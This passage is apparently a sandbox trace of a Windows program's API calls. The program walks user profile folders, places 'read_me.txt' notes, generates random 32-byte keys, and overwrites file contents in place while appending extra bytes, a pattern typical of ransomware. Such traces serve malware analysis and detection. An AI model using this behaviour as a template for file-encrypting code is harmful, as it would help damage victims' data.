lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Pictures", cAlternateFileName="")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x253bcc60, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x253bcc60, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x253bcc60, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\read_me.txt") returned 32 [0082.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\read_me.txt" (normalized: "c:\\users\\default\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8bc [0082.989] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0082.989] CloseHandle (hObject=0x8bc) returned 1 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Recent", cAlternateFileName="")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x251cda80, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x251cda80, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x252d8420, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x252d8420, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Searches", cAlternateFileName="")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches") returned 29 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="SendTo", cAlternateFileName="")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Videos", cAlternateFileName="")) returned 1 [0082.989] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Videos", cAlternateFileName="")) returned 0 [0082.990] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0082.990] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\read_me.txt") returned 32 [0082.990] GetProcessHeap () returned 0x4f10000 [0082.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0082.990] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 94 [0082.990] GetProcessHeap () returned 0x4f10000 [0082.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0082.990] GetProcessHeap () returned 0x4f10000 [0082.990] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0082.990] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned 39 [0082.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0082.990] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\read_me.txt") returned 49 [0082.990] GetProcessHeap () returned 0x4f10000 [0082.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0082.990] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 95 [0082.990] GetProcessHeap () returned 0x4f10000 [0082.990] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e21120 | out: hHeap=0x4f10000) returned 1 [0082.991] SetFilePointerEx (in: hFile=0x8f0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.991] ReadFile (in: hFile=0x8f0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.991] SetFilePointerEx (in: hFile=0x8f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.991] GetProcessHeap () returned 0x4f10000 [0082.991] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.991] GetProcessHeap () returned 0x4f10000 [0082.991] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.991] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.991] GetProcessHeap () returned 0x4f10000 [0082.991] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.991] ReadFile (in: hFile=0x8f0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.047] SetFilePointerEx (in: hFile=0x8f0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.047] WriteFile (in: hFile=0x8f0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.047] GetProcessHeap () returned 0x4f10000 [0083.047] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.048] GetProcessHeap () returned 0x4f10000 [0083.048] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.049] GetProcessHeap () returned 0x4f10000 [0083.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.050] GetProcessHeap () returned 0x4f10000 [0083.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.051] GetProcessHeap () returned 0x4f10000 [0083.051] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.051] SetFilePointerEx (in: hFile=0x8f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.052] WriteFile (in: hFile=0x8f0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0083.052] WriteFile (in: hFile=0x8f0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0083.052] GetProcessHeap () returned 0x4f10000 [0083.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0083.052] GetProcessHeap () returned 0x4f10000 [0083.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.052] GetProcessHeap () returned 0x4f10000 [0083.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.052] CloseHandle (hObject=0x8f0) returned 1 [0083.053] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 94 [0083.053] SetFilePointerEx (in: hFile=0x8f4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.053] ReadFile (in: hFile=0x8f4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0083.053] SetFilePointerEx (in: hFile=0x8f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.053] GetProcessHeap () returned 0x4f10000 [0083.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.053] GetProcessHeap () returned 0x4f10000 [0083.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.053] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 